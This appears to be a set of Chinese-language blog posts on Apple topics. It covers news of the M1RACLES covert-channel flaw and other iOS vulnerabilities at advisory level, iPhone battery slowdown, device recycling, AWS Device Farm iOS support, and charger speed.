居然在安全性漏洞的 PoC 上面看到拿 Bad Apple!! 當作範例

人在日本的資安專家 Hector Martin 找到了 Apple M1 的安全漏洞,可以不用透過 macOS Big Sur 提供的界面,直接透過 M1 的漏洞跨使用者權限傳輸資料,這可以用在突破 sandbox 的限制。而也如同目前的流行,他取了一個好記的名字:「M1RACLES: M1ssing Register Access Controls Leak EL0 State」,對應的 CVECVE-2021-30747

先講比較特別的點,PoC 的影片放在 YouTube 上,作者拿 Bad Apple!! 當作示範,這很明顯是個雙關的點:

這應該是當年的影繪版本,看了好懷念啊... 當年看到的時候有種「浪費才能」的感覺,但不得不說是個經典。

Hacker News 上有討論可以翻翻:「M1racles: An Apple M1 covert channel vulnerability (m1racles.com)」。

依照作者的說明,Apple A14 因為架構類似,也有類似的問題,不過作者沒有 iPhone,沒辦法實際測試:

Are other Apple CPUs affected?

Maybe, but I don't have an iPhone or a DTK to test it. Feel free to report back if you try it. The A14 has been confirmed as also affected, which is expected, as it is a close relative of the M1.

另外作者覺得這個安全漏洞在 macOS 上還好,主要是你系統都已經被打穿可以操控 s3_5_c15_c10_1 register 了,應該會有更好的方式可以用:

So you're telling me I shouldn't worry?

Yes.

What, really?

Really, nobody's going to actually find a nefarious use for this flaw in practical circumstances. Besides, there are already a million side channels you can use for cooperative cross-process communication (e.g. cache stuff), on every system. Covert channels can't leak data from uncooperative apps or systems.

Actually, that one's worth repeating: Covert channels are completely useless unless your system is already compromised.

比較明顯的問題應該是 iOS 這邊的 privacy issue,不過 iOS 上的 app store 有基本的保護機制:(不過想到作者可以故意寫成 RCE 漏洞...)

What about iOS?

iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet.

However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple is planning to deploy these checks (or whether they have already done so), but they are aware of the potential issue and it would be reasonable to expect they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.

iPhone 的電池與效能

Hacker News 上看到 Reddit 上的這則說明:「PSA: iPhone slow? Try replacing your battery!」。

他提到他的 iPhone 6S 很慢,本來以為是 iOS 11 導致的,結果發現他弟弟 (或是哥哥?) 的 iPhone 6 也是跑 iOS 11,但是快很多... 所以他就試著研究,最後決定換電池:

My iPhone 6S has been very slow these past few weeks, and even after updating multiple times, it was still slow. Couldn’t figure out why, but just thought that iOS 11 was still awful to me. Then I used my brother’s iPhone 6 Plus and his was... faster than mine? This is when I knew something was wrong. So, I did some research, and decided to replace my battery.

結果發現換電池後速度就上來了,上面這張是換電池之前,下面那張是換電池之後:

所以是在電力不足的情況下會降速?

iOS 上測試的軟體是 Geekbench 4,而官方也有給參考值 (Geekbench 的),在 iOS Benchmarks - Geekbench Browser 可以參考。如果在吃滿電、重開機,沒有背景的情況下還是很慢的話,有機會是類似的問題?

解鎖 iPhone 的 Diper ID...

Twitter 上看到 Diper ID 這個糟糕的東西:

查了資料,操作方式可以從這個影片看到:

這明顯有資安問題啊 XDDD

iOS 透過無線網路的 RCE...

在「About the security content of iOS 10.3.1」這邊的說明:

Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later
Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip
Description: A stack buffer overflow was addressed through improved input validation.
CVE-2017-6975: Gal Beniamini of Google Project Zero

這描述看起來就不太妙...

蘋果裝置的報廢過程:香港

Bloomberg 的「Where Your iPhone Goes to Die (and Be Reborn)」這篇稍微描述了 Apple 裝置回收後的報廢過程。

報導是寫香港的報廢工廠,但受限於與蘋果的合約就不能具名說是誰:

While global brands including HP, Huawei, Amazon and Microsoft also have detailed protocols for recycling their products, Apple’s are the most rigid and exacting, according to people involved in the processes, who declined to be identified because they’re not authorized to speak about clients.

不過 Bloomberg 的人有跟蘋果官方取得一些訪問資料:

"I think people expect it of us, I think our customers hold us to a high standard," Lisa Jackson, Apple’s head of environmental affairs, said by phone from the company’s Cupertino headquarters. "It’s difficult, because these are incredibly complex pieces of product."

另外也有提到取得時的成本:

After a quick test, the recycler will either buy the phone or offer to scrap it for free. In the U.S., payouts for working phones range from $100 for the smallest-capacity iPhone 4, to $350 for the largest iPhone 6 Plus. More stringent testing then shows whether the handset can be resold or must be scrapped.

以及 Bloomberg 做的一些圖表,可以看到各種處理的原則以及回收的大概流程:

AWS Device Farm 支援 iOS Device 了

AWS 前幾天宣佈將在 8/4 發表 AWS Device Farm 支援 iOS 的消息,剛剛看到了:「AWS Device Farm adds support for iOS – Test your iOS, Android and Fire OS apps against real devices in the AWS Cloud」。

在「Device List」這邊可以看到所有支援的機種,iOS 的部份包括了 iPadiPhoneiPod Touch,看起來只有比較新的機種有支援...

AWS Device Farm 將支援 iOS 裝置

剛剛在 Twitter 上先看到了:「Coming Soon – AWS Device Farm Support for iOS Apps」。

We plan to launch support for iOS on August 4, 2015 with support for the following test automation frameworks:

應該是有跟蘋果合作吧,感覺會是成千上萬隻的量在跑... XD

iOS 8 的 DoS 攻擊:強制無限重開機

Twitter 上看到別人 retweet 的新聞:

RSA Conference 發表的 0-day exploit:「iOS 8 Vulnerability Lets Hackers Crash Any iPhone and iPad Within Wi-Fi Range」。

Adi Sharabani and Yair Amit of Mobile security firm Skycure presented their latest research, titled "No iOS Zone", at the RSA security conference in San Francisco on Tuesday.

示範影片:

起因自 iOS 對惡意 SSL certificate 的處理會造成重開機:

All an attacker need to do is create a malicious wireless network that uses the Wi-Fi connection in order to manipulate SSL certificates sent to iOS handsets.

目前最好的解法是關閉無線網路:

Another best measure is to simply avoid the free wireless networks you find in the street providing public Internet access.

加速 iPhone 6 與 iPhone 6+ 的充電速度

出自「This killer trick will charge your iPhone 6 in half the time」,他們發現拿 iPad 的 12W 充電器充會快很多:

You can use a 12-watt iPad charger to juice up the iPhone 6 and iPhone 6 Plus in half the time when compared to the 5-watt iPhone charger your device ships with by default.